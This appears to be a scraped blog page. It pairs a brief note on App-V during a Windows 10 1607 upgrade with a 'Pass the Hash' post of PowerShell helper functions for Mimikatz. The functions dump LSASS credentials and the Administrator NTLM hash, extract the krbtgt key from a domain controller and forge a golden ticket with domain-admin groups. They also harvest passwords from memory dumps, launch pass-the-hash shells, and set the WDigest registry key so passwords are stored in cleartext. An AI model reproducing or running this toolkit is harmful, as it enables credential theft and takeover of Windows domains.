Windows 10–1607 and App-V

With the new windows 10 version in place, App-V is integrated into the operating system. Probably you wonder what will happen to machine that gets an inplace upgrade with an installed App-V Client?

The cache stays and the App-V application gets uninstalled and the App-V feature gets enabled. So it should be a flawless migration from Windows 10 – 1511 with a current App-V Client to Windows 10-1607.

AppV

Windows 10–1607 and App-V

Pass the Hash

one of the main security issues with windows is pass the hash. I added some functions to the Mimikatz Powershell script that can be found here.

 

The functions that make the usage of mimikatz more easy. Just add these functions to the end of the mimikatz script and launch the script. Then the functions are in memory and available functions will be shown.

Function Global:invoke-mimiDom {
    if (Test-path „$ScriptPath\mimi_dom.log“) {
    $MimiUser =“didi44″
    write-host $scriptpath -foregroundcolor green
    $global:mimidata = Get-Content „$ScriptPath\mimi_dom.log“
    Foreach ($line in $mimidata){
    if ($line -match „aes256_hmac“) {$global:aes = $($line.split(„:“)[1]).trim()}
    if ($line -match „Domain :“) {$global:domSid = $($line.split(„/“)[1]).trim()}
    if ($line -match „Default Salt :“) {$global:domain = $($($line.split(„:“)[1]).trim()).replace(„krbtgt“,““)}

}
    $FullCMD= „kerberos::golden /domain:“ + $domain  + “ /sid:“ + $domsid + “ /aes256:“ + $aes + “ /user:“ + $mimiUser + “ /id:500 /groups:500,501,513,512,520,518,519 /ticket:forged.kirbi“
    Write-host $fullcmd
    invoke-mimikatz -command „privilege::debug kerberos::purge `“$fullcmd`“ `“kerberos::ptt forged.kirbi`“ misc::cmd“
    } ELSE {
        Write-host „there is no mimi_dom.log, please run first invoke-mimiexportdom  on a domain controller“ -foregroundcolor red
    }

}

Function Global:invoke-mimiStd {
$global:mimi_tmp  = Invoke-Mimikatz
$mimi_TMP | Out-File „$ScriptPath\mimi.log“
$global:mimi = Get-Content „$ScriptPath\mimi.log“
foreach ($line in $mimi){
        $number++
        if ($line -match „\* Username : Administrator“){
            $Global:mimiUsername1 = $($line.split(„:“)[1]).trim()
            $Global:mimiDom1 = $($mimi[$number].split(„:“)[1]).trim()
            $Global:mimiHash1 = $($mimi[$number+1].split(„:“)[1]).trim()
            break
        }
    }
Write-host „$mimiusername1 $mimiDom1 $mimihash1“
}

FUNCTION Global:invoke-MimiExportDom {
if (!(test-path „$scriptpath\mimi_dom.log“)){
    $global:mimi_dom_tmp = Invoke-mimikatz -command „privilege::debug `“lsadump::lsa /inject /name:krbtgt`““
    $global:mimi_dom_tmp | Out-File „$scriptpath\mimi_dom.log“
    $global:mimi_dom = get-content „$ScriptPath\mimi_dom.log“
}
}

FUNCTION Global:Invoke-mimiDMP {
$dmps = get-childitem „$scriptpath\*.dmp“
foreach ($dmp in $dmps) {
    Write-host „analysing $dmp“ -foregroundcolor green
    $global:mimi = invoke-mimikatz -command „privilege::debug `“sekurlsa::minidump $dmp`“ sekurlsa::logonpasswords“
    }
    Write-host $mimi
}

FUNCTION Global:Invoke-mimicmd {
    If ($mimiUsername1 -lt 1){
        Write-host „please run first invoke-mimiSTD“ -foregroundcolor red}
    ELSE {
        $command =  „privilege::debug `“sekurlsa::pth /user:“ + $mimiUsername1 + “ /domain:“+ $mimiDom1 + “ /ntlm:“ + $mimiHash1 +“ /run:cmd`““
        write-host „$command“
        $global:mimi = invoke-mimikatz -command $command
    }
}

 

#sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND

If ($( get-itemproperty HKLM:\system\CurrentControlSet\Control\SecurityProviders\WDigest\).uselogoncredential -ne 1){
    reg add HKLM\system\CurrentControlSet\Control\SecurityProviders\WDigest -v UseLogonCredential -t Reg_DWORD /d 1
    Write-host „changed security provider – to see passeword in cleartext logoff and log on again“ -ForegroundColor Yellow
    }

Write-host „the following functions are available:“
write-host „invoke-mimiStd“ -foregroundcolor green
write-host „invoke-mimiExportDom“ -foregroundcolor green
write-host „invoke-mimiDom“ -foregroundcolor green
write-host „invoke-mimiDmp“ -foregroundcolor green
write-host „invoke-mimiCMD“ -foregroundcolor green

Pass the Hash